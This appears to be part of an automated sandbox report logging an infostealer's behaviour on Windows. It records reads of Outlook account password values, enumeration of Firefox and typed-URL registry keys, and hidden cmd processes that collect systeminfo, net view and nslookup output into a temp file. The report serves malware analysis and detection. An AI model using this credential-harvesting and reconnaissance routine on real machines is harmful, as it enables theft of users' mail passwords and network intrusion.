Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP Email Address False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = Email False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTP Server URL False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTPMail User Name False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTPMail Server False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP User False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTPMail Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Password2 False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = NNTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = HTTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Password False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = POP3 Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = SMTP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 value_name = IMAP Port, data = 0, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = LastTask, type = REG_NONE False 1
Fn
Read Value - data = Microsoft Url History Service True 1
Fn
Read Value - data = C:\Windows\System32\ieframe.dll True 1
Fn
Read Value - value_name = CacheLimit, type = REG_NONE True 3
Fn
Read Value - value_name = explorer.exe, type = REG_NONE False 2
Fn
Read Value - value_name = *, type = REG_NONE False 2
Fn
Read Value - value_name = explorer.exe, type = REG_NONE True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings value_name = ProxySettingsPerUser, type = REG_NONE False 1
Fn
Read Value - value_name = Enable False 1
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Ini, type = REG_NONE False 2
Fn
Read Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Exec, type = REG_NONE False 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace value_name = ValidateRegItems False 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace value_name = MonitorRegistry, data = 1 True 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace value_name = ValidateRegItems False 16
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace value_name = MonitorRegistry False 16
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached value_name = {9C73F5E5-7AE7-4E32-A8E8-8D23B85255BF} {000214E6-0000-0000-C000-000000000046} 0xFFFF, type = REG_NONE True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions value_name = HasFlushedShellExtCache, type = REG_NONE True 1
Fn
Read Value - data = Sync Center Folder True 1
Fn
Read Value - data = C:\Windows\System32\SyncCenter.dll True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace value_name = ValidateRegItems False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace value_name = MonitorRegistry False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders value_name = StorageDelegateSuppressionPolicy, type = REG_NONE True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\UsersFiles\NameSpace\DelegateFolders value_name = StorageDelegate, type = REG_NONE True 1
Fn
Read Value - data = Shell File System Folder True 1
Fn
Read Value - data = C:\Windows\system32\Windows.Storage.dll True 1
Fn
Read Value - value_name = UIStatus, type = REG_NONE True 1
Fn
Read Value - value_name = OnlyMember, type = REG_NONE True 1
Fn
Read Value - data = This PC True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace value_name = ValidateRegItems False 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace value_name = MonitorRegistry False 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\RemovableDrives value_name = ValidateRegItems False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\RemovableDrives value_name = MonitorRegistry False 1
Fn
Read Value Storage value_name = FilterMask, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced value_name = NeverShowDrivesMask, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced value_name = HideDrivesWithNoMedia, type = REG_NONE False 1
Fn
Read Value - data = Property System Both Class Factory True 1
Fn
Read Value - data = C:\Windows\system32\propsys.dll True 3
Fn
Read Value - type = REG_NONE False 2
Fn
Read Value - data = Local Thumbnail Cache True 1
Fn
Read Value - data = C:\Windows\System32\thumbcache.dll True 3
Fn
Read Value - data = Windows Search Platform True 2
Fn
Read Value - data = Home Group Member Status True 1
Fn
Read Value - data = C:\Windows\System32\provsvc.dll True 1
Fn
Read Value - data = Thumbnail Cache Class Factory for Out of Proc Server True 2
Fn
Read Value - data = Shell Oplock Provider True 1
Fn
Read Value - data = C:\Windows\system32\shcore.dll True 1
Fn
Write Value HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings value_name = EnableSPDY3_0, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = {111F6A44-3C4D-6BC7-CED5-30CFE2D96473}, size = 8, type = REG_BINARY True 1
Fn
Data
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = {36CFCEF2-1DFD-D85B-57CA-A18C7B9E6580}, size = 8, type = REG_BINARY True 1
Fn
Data
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, size = 40, type = REG_BINARY True 2
Fn
Data
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530 value_name = Client, size = 40, type = REG_BINARY True 2
Fn
Data
Write Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files value_name = 2A15B805C2DE35470F, size = 92, type = REG_BINARY True 1
Fn
Data
Delete Value HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files value_name = 2A15B805C2DE35470F True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\03fea8ae12202041b643a9691e5b323c - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\09917dd29831004f89474b112e58e0ab - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\5b59a51e8457564ab95b73c6194dc831 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\626dbd3f36ef4b4b9263a867695919ec - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9907df9e4a472f499f281fc91ee2bca1 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\b4c13fbaf5f22f44b93e8bdd93521484 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\dc184acfc7e1614eb31843d1abdfd43e - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - True 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 - False 1
Fn
Enumerate Keys HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox\TaskBarIDs - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Firefox - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB) - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Main - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB) - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB)\Uninstall - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\53.0.3 (x86 en-GB) - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3 - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3\bin - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3 - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3\extensions - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 53.0.3 - False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\Software\Mozilla - False 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs - False 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files - True 1
Fn
Enumerate Values HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\667F6611-8D0F-88EB-47FA-113C6BCED530\Files - False 1
Fn
Process (593)
»
Operation Process Additional Information Success Count Logfile
Create cmd /C "systeminfo.exe > C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0xbf0, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Create makecab.exe /F "C:\Users\CIIHMN~1\AppData\Local\Temp\1A70.bin" os_pid = 0x200, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Create cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0x198, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Create cmd /C "net view >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0x978, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Create cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0x86c, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Create cmd /C "nslookup 127.0.0.1 >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0x420, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Create cmd /C "echo -------- >> C:\Users\CIIHMN~1\AppData\Local\Temp\19E9.bin1" os_pid = 0xa1c, creation_flags = CREATE_DEFAULT_ERROR_MODE, CREATE_NO_WINDOW, show_window = SW_HIDE True 1
Fn
Get Info c:\windows\explorer.exe type = PROCESS_BASIC_INFORMATION True 586
Fn
